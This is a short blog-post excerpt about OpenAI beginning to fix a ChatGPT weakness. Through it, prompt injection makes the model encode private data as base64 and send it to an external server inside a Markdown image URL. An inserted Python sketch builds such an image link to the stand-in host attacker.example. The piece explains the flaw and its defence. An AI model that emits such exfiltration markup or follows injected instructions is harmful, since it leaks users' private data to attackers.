Dec. 21, 2023, 4:10 a.m.

Simon Willison's Weblog (simonwillison.net)

OpenAI Begins Tackling ChatGPT Data Leak Vulnerability


ChatGPT has long suffered from a frustrating data exfiltration vector that can be triggered by prompt injection attacks: it can be instructed to construct a Markdown image reference to an image hosted anywhere, which means a successful prompt injection can request that the model encode data (e.g. as base64) and then render an image that passes that data to an external server as part of the query string.
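
To make the mechanism concrete, here is a minimal sketch (not code from the post) of the kind of Markdown an injected prompt could ask the model to emit; the attacker domain, path, and query parameter name are placeholders invented for illustration.

```python
import base64

# Hypothetical illustration of the exfiltration channel described above.
# An injected instruction asks the model to base64-encode sensitive text and
# wrap it in a Markdown image whose URL points at an attacker-controlled host.

def exfiltration_markdown(secret: str,
                          collector: str = "https://attacker.example/pixel") -> str:
    """Build the kind of Markdown a prompt injection could ask the model to produce."""
    encoded = base64.urlsafe_b64encode(secret.encode("utf-8")).decode("ascii")
    # When the chat client renders this Markdown, it fetches the image URL,
    # delivering `encoded` to the attacker's server via the query string.
    return f"![loading]({collector}?q={encoded})"

print(exfiltration_markdown("user's earlier private message"))
```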

Good news: they've finally put measures …

Tags: ai, chatgpt, data leak, generativeai, llms, markdown, openai, prompt injection, security, vulnerability
